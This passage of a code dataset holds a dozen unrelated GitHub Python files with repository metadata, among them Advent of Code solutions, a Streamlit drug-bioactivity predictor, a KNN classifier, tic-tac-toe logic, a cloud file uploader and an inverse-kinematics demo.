3',\n 'deal with increment 9',\n 'deal with increment 3',\n 'cut -1',\n ]\n assert(shuffle(list(range(10)), instructions) == [9, 2, 5, 8, 1, 4, 7, 0, 3, 6])\n\n instructions = [a.strip() for a in open('day22.input').readlines()]\n\n print('Part 1:', shuffle(list(range(10007)), instructions).index(2019))\n\n # Part 2\n\n deck = list(range(119315717514047))\n for _ in range(101741582076661):\n deck = shuffle(deck, instructions)\n\n print(\"Part 2:\", deck[2020])\n","repo_name":"CheeseTheMonkey/AdventOfCode","sub_path":"2019/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5439623027","text":"#!/usr/bin/env python\n# Created by Kevin M\nimport grovepi\n\n#Parameter: Ports of input, in order from left, middle right\n#Output: Distance from object being viewed in order of left, middle, right\ngrovepi.set_bus(\"RPI_1\")\n\ndef ultraread(portL,portM,portR):\n try:\n reading = [grovepi.ultrasonicRead(portL),grovepi.ultrasonicRead(portM),grovepi.ultrasonicRead(portR)]\n #print(type(reading))\n return reading\n except Exception as e:\n print (\"Error is {}\".format(e))\n","repo_name":"mghera02/Engr162Proj3","sub_path":"usRead.py","file_name":"usRead.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73214756401","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'zhwei'\n\nfrom ..patient.models import Patient\nfrom ..region.models import LivingRegion\nfrom ..volunteer.models import Volunteer\nfrom ..medical.models import Hospital, Doctor\n\ndef set_user_identity(user, key):\n \"\"\" 为用户设置角色\n \"\"\"\n _dic = {\n 'patient': Patient,\n 'doctor': Doctor,\n 'hospital': Hospital,\n 'volunteer': Volunteer,\n # 5: ('druggist')\n }\n if 'patient' == key: user.is_patient = True\n if 'doctor' == key: user.is_doctor = True\n if 'hospital' == key: user.is_hospital = True\n if 'volunteer' == key: user.is_volunteer = True\n _dic[key].objects.create(user=user)\n return True\n\n\ndef set_user_region(user, cate, province, city, area):\n \"\"\" 设置用户住址\n \"\"\"\n _region = LivingRegion.objects.get_or_create(user_id=user.id, cate=cate)[0]\n _region.province, _region.city, _region.area = province, city, area\n _region.save()\n return _region","repo_name":"sdutlinux/pahchina","sub_path":"pahchina/apps/accounts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"4472608535","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 17 08:28:57 2021\r\n\r\n@author: OLUWABUSUYI\r\n\"\"\"\r\n\r\nclass budget:\r\n \r\n def __init__(self, name, dep_amt, with_amt, bal ):\r\n self.name = name\r\n self.dep_amt = dep_amt\r\n self.with_amt = with_amt\r\n self.bal = bal\r\n \r\n def deposit(self):\r\n print (f'The {self.name} deposit is {self.dep_amt} ')\r\n \r\n def withdrawal(self):\r\n print (f'The {self.name} withdrawal is {self.with_amt}')\r\n \r\n def balance (self):\r\n print (f'The {self.name} balance is {self.bal}')\r\n \r\n def transfer (self):\r\n print (f'The maximum amount to be transferred from {self.name} to another category is {self.bal}')\r\n print (' ')\r\n \r\n\r\n\r\nbudget_1 = budget('food', 10000, 2000, 8000)\r\nbudget_1.deposit ()\r\nbudget_1.withdrawal()\r\nbudget_1.balance ()\r\nbudget_1.transfer()\r\n\r\nbudget_2 = budget('clothing', 5000, 2000, 3000)\r\nbudget_2.deposit ()\r\nbudget_2.withdrawal()\r\nbudget_2.balance ()\r\nbudget_2.transfer()\r\n\r\nbudget_3 = budget('entertainment', 1000, 500, 500)\r\nbudget_3.deposit ()\r\nbudget_3.withdrawal()\r\nbudget_3.balance ()\r\nbudget_3.transfer()\r\n ","repo_name":"Oluwabusuyi1/zuri_oop","sub_path":"OOP.py","file_name":"OOP.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34798888435","text":"\n\ndef get_range(nums, start, end):\n end %= len(nums)\n\n return nums[start:] + nums[:end] if end <= start else nums[start:end]\n\ndef set_range(nums, values, start, end):\n end %= len(nums)\n\n if end <= start:\n nums[start:] = values[:len(nums) - start]\n nums[:end] = values[len(nums) - start:]\n else:\n nums[start:end] = values\n return nums\n\ndef reverse_range(nums, start, end):\n return set_range(nums, list(reversed(get_range(nums, start, end))), start, end)\n\ndef pad_left(num):\n num = str(num)\n while len(num) < 2:\n num = '0' + num\n\n return num\n\ndef xor(nums):\n return eval(\n str(nums)\n .replace('[', '')\n .replace(']', '')\n .replace(',', ' ^')\n )\n\n\ndef knot_hash(string):\n lengths = list(map(ord, string)) + [17, 31, 73, 47, 23]\n nums = list(range(256))\n position = 0\n skip_size = 0\n\n for _ in range(64):\n for length in lengths:\n if length != 0:\n reverse_range(nums, position, position + length)\n position += length + skip_size\n position %= len(nums)\n skip_size += 1\n return ''.join(pad_left(hex(knot_hash).replace('0x', '')) for knot_hash in (xor(nums[i * 16:i * 16 +16]) for i in range(16)))\n\nif __name__ == '__main__':\n print(knot_hash('147,37,249,1,31,2,226,0,161,71,254,243,183,255,30,70'))\n","repo_name":"gallyamb/advent-of-code","sub_path":"2017/10.2.day.py","file_name":"10.2.day.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5393777360","text":"import tensorflow as tf\n\ninit_val = tf.random_normal(shape=(1, 5), mean=0, stddev=1)\n# var = tf.Variable(init_val, name='var')\nvar = tf.get_variable(name='var', shape=(1, 5), initializer=tf.random_normal_initializer(mean=0, stddev=1))\nwith tf.variable_scope(name_or_scope='', reuse=True):\n \"\"\"tf.variable_scope 를 사용하면 변수를 공유할 수 있다.\"\"\"\n var_1 = tf.get_variable(name='var')\nprint('pre run: \\n{}'.format(var))\n\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n sess.run(init)\n post_var, post_var_1 = sess.run([var, var_1])\n\nprint('\\npost run: \\n{}'.format(post_var))\nprint('\\npost run: \\n{}'.format(post_var_1))","repo_name":"foru120/PythonRepository","sub_path":"Books/LearningTensorFlow/Chapter3_Tensorflow_Basic_Understand/subchapter_03_04_Variable.py","file_name":"subchapter_03_04_Variable.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"33364451310","text":"# Import Libraries\n\nimport numpy as np\nimport pandas as pd\nimport streamlit as st\nimport pickle\nfrom rdkit import Chem\nfrom rdkit.Chem import Descriptors, Lipinski\nimport subprocess\nimport os\nimport base64\n\n# Molecular descriptor calculator\ndef desc_calc():\n # Performs the descriptor calculation\n bashCommand = \"java -Xms2G -Xmx2G -Djava.awt.headless=true -jar ./PaDEL-Descriptor/PaDEL-Descriptor.jar -removesalt -standardizenitro -fingerprints -descriptortypes ./PaDEL-Descriptor/PubchemFingerprinter.xml -dir ./ -file descriptors_output.csv\"\n process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n os.remove('molecule.smi')\n\n# Lipinski Descriptor calculator\ndef lipinski(smiles, verbose=False):\n\n moldata= []\n for elem in smiles:\n mol=Chem.MolFromSmiles(elem)\n moldata.append(mol)\n\n baseData= np.arange(1,1)\n i=0\n for mol in moldata:\n\n desc_MolWt = Descriptors.MolWt(mol)\n desc_NumHDonors = Lipinski.NumHDonors(mol)\n desc_NumHAcceptors = Lipinski.NumHAcceptors(mol)\n\n row = np.array([desc_MolWt,\n desc_NumHDonors,\n desc_NumHAcceptors])\n\n if(i==0):\n baseData=row\n else:\n baseData=np.vstack([baseData, row])\n i=i+1\n\n columnNames=[\"MW\",\"NumHDonors\",\"NumHAcceptors\"]\n descriptors = pd.DataFrame(data=baseData,columns=columnNames)\n\n return descriptors\n\n# File download\ndef filedownload(df):\n csv = df.to_csv(index=False)\n b64 = base64.b64encode(csv.encode()).decode() # strings <-> bytes conversions\n href = f'Download Predictions'\n return href\n\n# Model building\ndef build_model(input_data):\n # Reads in saved regression model\n load_model = pickle.load(open('aromtase_model.pkl', 'rb'))\n # Apply model to make predictions\n prediction = load_model.predict(input_data)\n st.header('**Prediction output**')\n prediction_output = pd.Series(prediction, name='pIC50')\n molecule_name = pd.Series(load_data[1], name='molecule_name')\n df = pd.concat([molecule_name, prediction_output], axis=1)\n st.write(df)\n st.markdown(filedownload(df), unsafe_allow_html=True)\n\n# Page title\nst.markdown(\"\"\"\n# Aromtase Bioactivity Prediction App\nThis app allows you to predict how effective a compound is at inhibting the `Aromatase` enzyme. `Aromatase` is a drug target for Breast Cancer.\n**Credits**\n- App built in `Python` + `Streamlit` by [Gowrav Mannem](https://www.linkedin.com/in/gowrav-mannem-830896218/).\n- Adopted from Chanin Nantasenamat's(AKA [Dataprofessor](https://github.com/dataprofessor)) [Youtube Tutorial](https://www.youtube.com/watch?v=jBlTQjcKuaY&t=4960s)\n- Descriptor calculated using [PaDEL-Descriptor](http://www.yapcwsoft.com/dd/padeldescriptor/).\n- Lipinski Descriptors found using [RDKit](https://www.rdkit.org/).\n---\n\"\"\")\n\n# Sidebar\nwith st.sidebar.header('1. Upload your CSV data'):\n uploaded_file = st.sidebar.file_uploader(\"Upload your input file\", type=['txt'])\n st.sidebar.markdown(\"\"\"\n[Example input file](https://raw.githubusercontent.com/dataprofessor/bioactivity-prediction-app/main/example_acetylcholinesterase.txt)\n\"\"\")\n# User starts prediction process\nif st.sidebar.button('Predict'):\n # reading input data\n load_data = pd.read_table(uploaded_file, sep=' ', header=None)\n load_data.to_csv('molecule.smi', sep = '\\t', header = False, index = False)\n\n # printing out input data\n st.header('**Original input data**')\n st.write(load_data)\n\n # animation\n with st.spinner(\"Calculating descriptors...\"):\n desc_calc()\n\n # Read in calculated descriptors and display the dataframe\n st.header('**Calculated Fingerprint descriptors**')\n fp_desc = pd.read_csv('descriptors_output.csv')\n st.write(fp_desc)\n st.write(fp_desc.shape)\n\n # Read in Lipinski descriptors\n lipinski_df=lipinski(load_data)\n st.header('**Calculated Lipinski Descriptors**')\n st.write(lipinski_df)\n st.write(lipinski_df.shape)\n\n # combining the two dataframes\n aromatase_XY = pd.concat([fp_desc, lipinski_df], axis=1).reindex(fp_desc.index)\n # Read descriptor list used in previously built model\n st.header('**Combining the two dataframes and dropping Low variance features**')\n Xlist = list(pd.read_csv('descriptor_list.csv').columns)\n desc_subset = aromatase_XY[Xlist]\n st.write(desc_subset)\n st.write(desc_subset.shape)\n\n # Apply trained model to make prediction on query compounds\n build_model(desc_subset)\nelse:\n st.info('Upload input data in the sidebar to start!')\n","repo_name":"gowravmannem/Aromatase-Drug-Discovery","sub_path":"stream_lit_app.py","file_name":"stream_lit_app.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19005015957","text":"import csv \n\n# Menghitung jarak perkiraan dari dua buah titik\ndef hitung_perkiraan(x, y):\n\treturn abs(x['x1'] - y['x1']) + abs(x['x2'] - y['x2']) + abs(x['x3'] - y['x3']) + abs(x['x4'] - y['x4']) + abs(x['x5'] - y['x5'])\n\n# Memprediksi data dari datasets\ndef prediksi_data(nilai, data, x):\n\tdaftar_perkiraan = [{'hitung_perkiraan': float('inf')}]\n\tfor dataset in data:\n\t\thasil = hitung_perkiraan(nilai, dataset)\n\t\tif hasil < daftar_perkiraan[-1]['hitung_perkiraan']:\n\t\t\tif len(daftar_perkiraan) >= x:\n\t\t\t\tdaftar_perkiraan.pop()\n\t\t\ti = 0\n\t\t\twhile i < len(daftar_perkiraan)-1 and hasil >= daftar_perkiraan[i]['hitung_perkiraan']:\n\t\t\t\ti += 1\n\t\t\tdaftar_perkiraan.insert(i, {'hitung_perkiraan': hasil, 'Y': dataset['Y']})\n\tdaftar_nilai = list(map(lambda x: x['Y'], daftar_perkiraan))\n\treturn max(daftar_nilai, key=daftar_nilai.count)\n\n# Menulis hasil keluaran data ke file berformat csv\ndef hasil_file_csv(file_data, datacsv):\n\twith open(file_data, mode='w', newline='') as csv_ouput:\n\t\tcsv_file = csv.writer(csv_ouput)\n\t\tcsv_file.writerows(datacsv)\n\n# Klasifikasi datatest berdasarkan data pada file DataTrain\ndef hasil_klasifikasi(data_test, data_train, k):\n\tfor d_test in data_test:\n\t\td_test['Y'] = prediksi_data(d_test, data_train, k)\n\thasil_file_csv('TebakanTugas3.csv', map(lambda x: [x['Y']], data_test)) # Generate file csv\n\n# Fungsi untuk membaca data dari file csv \ndef baca_input_csv(f, kondisi=False):\n\tdataset = [] # buat array kosong untuk menampung nilai dari file csv yang dibaca\n\twith open(f) as csv_input:\n\t\tbaca_csv = csv.DictReader(csv_input, skipinitialspace=True)\n\t\tfor baris in baca_csv:\n\t\t\tdataset.append({'i': int(baris['Index']), 'x1': float(baris['X1']), 'x2': float(baris\t\t['X2']), 'x3': float(baris['X3']), 'x4': float(baris['X4']), 'x5': float(baris['X5']), 'Y': int(baris['Y']) if kondisi else baris['Y']}) \n\treturn dataset\n\n# Main program untuk menjalankan fungsi yang sudah dibuat sebelumnya\nif __name__ == '__main__':\n\thasil_klasifikasi(baca_input_csv('DataTest_Tugas3_AI.csv'), baca_input_csv('DataTrain_Tugas3_AI.csv', kondisi=True), 15) # Nilai parameter k = 15\n","repo_name":"mfaridzia/knn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39483776291","text":"__author__ = \"Benjamin Carpenter\", \"Landon Stoner\", \"Alex VanMannen\"\n\n\"\"\"\nttt_logic\n This module contains the logic to drive a two-player Tic-Tac-Toe\n game.\n\"\"\"\n\n'''\n---------------------------------------------------------------\n Define any global variables this module may need to maintain the\n state of a Tic-Tac-Toe game.\n---------------------------------------------------------------\n'''\n\nNW = None\nN = None\nNE = None\nW = None\nC = None\nE = None\nSW = None\nS = None\nSE = None\nplayer = \"X\"\n\ndef check_status():\n \"\"\"\n Checks to see if either player has won or if the board is filled. \n Returns a two-tuple in which the first component is the string\n \"X\" or the string \"O\" or the value None; the second component\n of the tuple is one of the following strings that indicates the\n Tic-Tac-Toe board's status:\n \"Playing\" No one has won and a move is available\n \"Win_NW_NE\" Win across top row\n \"Win_W_E\" Win across middle row\n \"Win_SW_SE\" Win across bottom row\n \"Win_NW_SW\" Win along left column\n \"Win_N_S\" Win along center column\n \"Win_NE_SE\" Win along right column\n \"Win_NW_SE\" Win from left-top corner to right-bottom \n \"Win_NE_SW\" Win from right-top corner to left-bottom \n \"Draw\" All squares filled with no winner\n The first component of the resulting tuple represents the game\n winner, and the second component of the tuple represents the\n winning configuration. If the status component is \"Playing\" or\n \"Draw\", the winner component should be None; for example, the\n tuple (\"X\", \"Win_NE_SE\") would be a valid return value, but\n neither (\"X\", \"Draw\") nor (\"O\", \"Playing\") represents a valid\n result. \n \"\"\"\n global NW, N, NE, W, C, E, SW, S, SE, wnr\n if NW == N and N == NE and NW == \"X\":\n return \"X\", 'Win_NW_NE'\n elif W == C and C == E and W == \"X\":\n return \"X\", \"Win_W_E\"\n elif SW == S and S == SE and SW == \"X\":\n return \"X\", \"Win_SW_SE\"\n elif NW == W and W == SW and NW == \"X\":\n return \"X\", \"Win_NW_SW\"\n elif N == C and C == S and N == \"X\":\n return \"X\", \"Win_N_S\"\n elif NE == E and E == SE and NE == \"X\":\n return \"X\", \"Win_NE_SE\"\n elif NW == C and C == SE and NW == \"X\":\n return \"X\", \"Win_NW_SE\"\n elif SW == C and C == NE and SW == \"X\":\n return \"X\", \"Win_NE_SW\"\n elif NW == N and N == NE and NW == \"O\":\n return \"O\", \"Win_NW_NE\"\n elif W == C and C == E and W == \"O\":\n return \"O\", \"Win_W_E\"\n elif SW == S and S == SE and SW == \"O\":\n return \"O\", \"Win_SW_SE\"\n elif NW == W and W == SW and NW == \"O\":\n return \"O\", \"Win_NW_SW\"\n elif N == C and C == S and N == \"O\":\n return \"O\", \"Win_N_S\"\n elif NE == E and E == SE and NE == \"O\":\n return \"O\", \"Win_NE_SE\"\n elif NW == C and C == SE and NW == \"O\":\n return \"O\", \"Win_NW_SE\"\n elif SW == C and C == NE and SW == \"O\":\n return \"O\", \"Win_NE_SW\"\n elif NW is not None and N is not None and NE is not None and W is not None and C is not None and E is not None and SW is not None and S is not None and SE is not None:\n return None, \"Draw\"\n else:\n return None, \"Playing\" # Replace with your implementation\n\n\ndef move(location):\n \"\"\"\n Places the current player's mark at the given location, if possible.\n The caller must pass one of the following strings specifying\n the location:\n \"NorthWest\" Top, left square\n \"North\" Top, middle square\n \"NorthEast\" Top, right square\n \"West\" Left, middle square\n \"Center\" Center square\n \"East\" Right, middle square\n \"SouthWest\" Bottom, left square\n \"South\" Bottom, middle square\n \"SouthEast\" Bottom, right square\n\n Returns True if the specified location is available (that is,\n the global variable keeping track of that position is None);\n otherwise the function returns False for an illegal move.\n If the current player makes a valid move, the function ensures\n that control passes to the other player; otherwise, the move\n function does not affect the current player.\n \"\"\"\n global NW, N, NE, W, C, E, SW, S, SE, player\n if location == \"NorthWest\" and NW is None:\n NW = player\n change_player()\n return True\n elif location == \"North\" and N is None:\n N = player\n change_player()\n return True\n elif location == \"NorthEast\" and NE is None:\n NE = player\n change_player()\n return True\n elif location == \"West\" and W is None:\n W = player\n change_player()\n return True\n elif location == \"Center\" and C is None:\n C = player\n change_player()\n return True\n elif location == \"East\" and E is None:\n E = player\n change_player()\n return True\n elif location == \"SouthWest\" and SW is None:\n SW = player\n change_player()\n return True\n elif location == \"South\" and S is None:\n S = player\n change_player()\n return True\n elif location == \"SouthEast\" and SE is None:\n SE = player\n change_player()\n return True\n else:\n return False\n\n\ndef current_player():\n \"\"\"\n Returns the player whose turn it is to move. This allows the\n presentation to report whose turn it is.\n Return value is one of either \"X\" or \"O\".\n \"\"\"\n global player\n return player # Replace with your implementation\n\n\ndef set_player(new_player):\n \"\"\"\n Sets the current player. Useful for games that require the\n player to answer a question correctly before a move. If the\n player answers incorrectly, the turn moves to the opponent.\n Valid values for new_player are \"X\" or \"O\"; any other strings\n will not change the current player.\n \"\"\"\n global player\n if new_player == \"X\" or new_player == \"O\":\n player = new_player\n else:\n pass # Replace with your implementation\n\n\ndef change_player():\n \"\"\"\n Alternates turns between players. X becomes O, and O becomes X.\n \"\"\"\n global player\n if current_player() == \"X\":\n player = \"O\"\n elif current_player() == \"O\":\n player = \"X\"\n else:\n pass # Replace with your implementation\n\n\ndef look(location):\n \"\"\"\n Returns the mark at the given location. The caller must pass \n one of the following strings specifying the location:\n \"NorthWest\" Top, left square\n \"North\" Top, middle square\n \"NorthEast\" Top, right square\n \"West\" Left, middle square\n \"Center\" Center square\n \"East\" Right, middle square\n \"SouthWest\" Bottom, left square\n \"South\" Bottom, middle square\n \"SouthEast\" Bottom, right square\n\n The function's valid return values are None, \"X\", or \"O\".\n Returns None if neither player has marked \n the given location. The function also returns None if the\n caller passes any string other than one of the location strings\n listed above.\n This function allows the presentation to draw the contents\n of the Tic-Tac-Toe board.\n \"\"\"\n if location == \"NorthWest\":\n if NW == \"X\":\n return \"X\"\n elif NW == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"North\":\n if N == \"X\":\n return \"X\"\n elif N == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"NorthEast\":\n if NE == \"X\":\n return \"X\"\n elif NE == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"West\":\n if W == \"X\":\n return \"X\"\n elif W == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"Center\":\n if C == \"X\":\n return \"X\"\n elif C == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"East\":\n if E == \"X\":\n return \"X\"\n elif E == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"SouthWest\":\n if SW == \"X\":\n return \"X\"\n elif SW == \"O\":\n return \"O\"\n else:\n return None \n elif location == \"South\":\n if S == \"X\":\n return \"X\"\n elif S == \"O\":\n return \"O\"\n else:\n return None\n elif location == \"SouthEast\":\n if SE == \"X\":\n return \"X\"\n elif SE == \"O\":\n return \"O\"\n else:\n return None\n else:\n return None # Replace with your implementation\n\n\ndef initialize_board():\n \"\"\"\n Make all the board locations empty and set current player to\n \"X\" (that is, reset the board to the start of a new game)\n \"\"\"\n global NW, N, NE, W, C, E, SW, S, SE\n NW = None\n N = None\n NE = None\n W = None\n C = None\n E = None\n SW = None\n S = None\n SE = None\n set_player(\"X\")\n \n \n \n\nif __name__ == \"__main__\":\n pass # This module is not meant to be run as a standalone program\n\n","repo_name":"NobleWolf42/Python101","sub_path":"Labs/TicTacToe/tttlogic.py","file_name":"tttlogic.py","file_ext":"py","file_size_in_byte":9158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21151294329","text":"''' module for uploading images and media to S3 Bucket and docs to Google Cloud Storage'''\n\nimport sys\nimport os\nimport boto3\nfrom google.cloud import storage\n#from .config import Config\n\n# adds the directory containing config file\nparent_dir = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, parent_dir) \nimport config\n\n# parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n# sys.path.insert(0, parent_dir) \n\nclass Transfer:\n '''File transfer class has functions for upload img, media to s3 and docs to gcs'''\n def __init__(self):\n self.aws_bucket_name = config.AWS_BUCKET\n self.gcs_bucket_name = config.GCS_BUCKET\n self.__create_s3_gcs_instance()\n \n\n\n def __create_s3_gcs_instance(self):\n\n try:\n self.s3_client = boto3.client(\n 's3',\n aws_access_key_id = config.AWS_ACCESS_KEY,\n aws_secret_access_key = config.AWS_SECRET_KEY\n )\n \n self.google_client = storage.Client.from_service_account_json(config.GOOGLE_SERVICE_ACCOUNT_KEY_PATH) \n\n except Exception as er:\n print('error in creating cloud instance, check your configuration : ', str(er))\n\n def transfer_files(self, source_directory):\n '''transfers files from local to cloud'''\n for root, dirs, files in os.walk(source_directory):\n for file in files:\n file_extension = file.split('.')[-1].lower()\n file_path = os.path.join(root, file)\n if file_extension in config.S3_ALLOWED_EXTENSIONS:\n self._upload_to_s3(file_path)\n\n elif file_extension in config.GOOGLE_ALLOWED_EXTENSIONS:\n self._upload_to_gcs(file_path)\n\n else: \n\n try:\n raise FileFormatError(f'{file_extension} format is not allowed to upload')\n \n except FileFormatError as fe:\n print(str(fr))\n \n\n def _upload_to_s3(self, file_path):\n \"\"\"uploads files to s3 bucket\"\"\"\n try: \n self.s3_client.upload_file(file_path, self.aws_bucket_name, os.path.basename(file_path))\n print('Files uploaded to S3 bucket successfully')\n\n except Exception as er:\n print('error in uploading file to s3 bucket : ', str(er))\n \n def _upload_to_gcs(self, file_path):\n\n \"\"\" uploads files to Google Cloud Storage\"\"\" \n try:\n gcs_bucket = self.google_client.get_bucket(self.gcs_bucket_name)\n blob = gcs_bucket.blob(os.path.basename(file_path))\n blob.upload_from_filename(file_path)\n print('Files uploaded to GCS successfully')\n\n except Exception as er:\n print('erorr in uploading docs to GCS', str(er)) \n \n\n","repo_name":"rudresh1/file_transfer","sub_path":"transfer/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28876848052","text":"\nimport math\nimport numpy as np\nimport pygame as pg\n\nlink1_length = 400\nlink2_length = 400\n\norigin = [0, 0]\n\nsteps = 1000\ntheta_1 = np.linspace(math.radians(0), math.radians(180), steps)\ntheta_2 = np.linspace(math.radians(0), math.radians(180), steps)\n\n\ndef end_effector_x(angle1, angle2):\n return int(link1_length * math.cos(angle1) + link2_length * math.cos(angle1 + angle2))\n\n\ndef end_effector_y(angle1, angle2):\n return int(link1_length * math.sin(angle1) + link2_length * math.sin(angle1 + angle2))\n\n\n# Returns a list of every single combination of angles.\n# Amount of possible angles is dictated by the angle limit and step size\ndef append_angles_to_list(angle1, angle2):\n _angle_list = []\n for x in range(0, len(angle1)):\n _temp_angle_list = []\n for y in range(0, len(angle2)):\n _temp_angle_list.append([math.degrees(angle1[x]), math.degrees(angle2[y])])\n _angle_list.append(_temp_angle_list)\n return _angle_list\n\n\nangle_list = append_angles_to_list(theta_1, theta_2)\n\n\ndef solve_analytical_ik():\n _pos_list = []\n for x in range(0, steps):\n _temp_pos_list = []\n for y in range(0, steps):\n x_pos = end_effector_x(theta_1[x], theta_2[y])\n y_pos = end_effector_y(theta_1[x], theta_2[y])\n _temp_pos_list.append((x_pos, y_pos))\n _pos_list.append(_temp_pos_list)\n return _pos_list\n\n\npos_list = solve_analytical_ik()\n\n\ndef match_point_with_angle(end_eff_x, end_eff_y):\n for x in range(0, len(pos_list)):\n for y in range(0, len(pos_list[x])):\n if pos_list[x][y][0] == end_eff_x and pos_list[x][y][1] == end_eff_y:\n # print(x,y)\n # print(\"I FOUND A MATCH\")\n return [x, y]\n\n\ndef rotate_vector(length, angle):\n rad_angle = math.radians(angle)\n return [length * math.cos(rad_angle), length * math.sin(rad_angle)]\n\n\npg.init()\nsize = width, height = pg.display.Info().current_w, pg.display.Info().current_h\nscreen = pg.display.set_mode(size)\n\nwhite = 255, 255, 255\nblack = 0, 0, 0\nblue = 0, 0, 255\n\nrunning = True\nwhile running:\n\n screen.fill(white)\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n running = False\n\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_ESCAPE:\n running = False\n\n mouse_pos = pg.mouse.get_pos()\n\n pg.draw.circle(screen, black, mouse_pos, 5)\n pg.draw.circle(screen, black, origin, link1_length + link2_length, 5)\n try:\n solution = match_point_with_angle(mouse_pos[0], mouse_pos[1])\n angles = angle_list[solution[0]][solution[1]]\n\n vec_1 = rotate_vector(link1_length, angles[0])\n vec_2 = pos_list[solution[0]][solution[1]]\n pg.draw.circle(screen, blue, vec_1, 5)\n pg.draw.circle(screen, blue, vec_2, 5)\n pg.draw.aaline(screen, black, origin, vec_1)\n pg.draw.aaline(screen, black, vec_1, vec_2)\n\n except:\n pass\n\n pg.display.flip()\n","repo_name":"J0pper/Analytical-Inverse-Kinematics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26082007992","text":"import json\nfrom main import User, Order, Offer, db\nfrom datetime import datetime\n\n\ndef get_data_from_json(path):\n with open(path, encoding='utf-8') as file:\n data = json.load(file)\n return data\n\n\ndef add_users_to_db():\n for user_data in get_data_from_json('data/users.json'):\n user = User(first_name=user_data['first_name'],\n last_name=user_data['last_name'],\n age=user_data['age'],\n email=user_data['email'],\n role=user_data['role'],\n phone=user_data['phone'])\n db.session.add(user)\n db.session.commit()\n\n\ndef add_offers_to_db():\n for offers_data in get_data_from_json('data/offers.json'):\n offer = Offer(order_id=offers_data['order_id'],\n executor_id=offers_data['executor_id'])\n db.session.add(offer)\n db.session.commit()\n\n\ndef add_orders_to_db():\n for orders_data in get_data_from_json('data/orders.json'):\n order = Order(name=orders_data['name'],\n description=orders_data['description'],\n start_date=datetime.strptime(orders_data['start_date'], '%m/%d/%Y'),\n end_date=datetime.strptime(orders_data['end_date'], '%m/%d/%Y'),\n address=orders_data['address'],\n price=orders_data['price'],\n customer_id=orders_data['customer_id'],\n executor_id=orders_data['executor_id'])\n db.session.add(order)\n db.session.commit()\n\n\ndb.drop_all()\ndb.create_all()\nadd_users_to_db()\nadd_offers_to_db()\nadd_orders_to_db()\n","repo_name":"Sh1nso/FirstAlchProject","sub_path":"utils_for_db.py","file_name":"utils_for_db.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27632647582","text":"import asyncio\nimport aiomysql\n\n\nasync def fetchall(sql, loop):\n async with aiomysql.create_pool(\n host='127.0.0.1',\n port=3306,\n user='root',\n password='root',\n db='trial',\n loop=loop\n ) as pool:\n async with pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(sql)\n return await cur.fetchall()\n\nasync def main(loop):\n '''\n '''\n a = await fetchall('SELECT * FROM t_user', loop)\n print(a)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(loop))\n loop.close()\n","repo_name":"chaosannals/trial-python","sub_path":"olddemo/main/aio/mysql.py","file_name":"mysql.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6612869373","text":"from sqlalchemy import Column, Integer, String\n\nfrom .base import session_factory, Base\n\n\nclass Job(Base):\n __tablename__ = 'job'\n id = Column('id', Integer, primary_key=True)\n company_name = Column('company_name', String)\n job_title = Column('job_title', String)\n location = Column('location', String)\n\n\ndef add_record(company_name, job_title, location):\n if record_exists(company_name, job_title, location):\n return\n session = session_factory()\n job = Job(\n company_name=company_name,\n job_title=job_title,\n location=location\n )\n session.add(job)\n session.commit()\n session.close()\n\n\ndef record_exists(company_name, job_title, location):\n session = session_factory()\n result = session.query(Job).filter(Job.company_name == company_name).filter(\n Job.job_title == job_title).filter(Job.location == location)\n session.close()\n if result.count() == 0:\n return False\n return 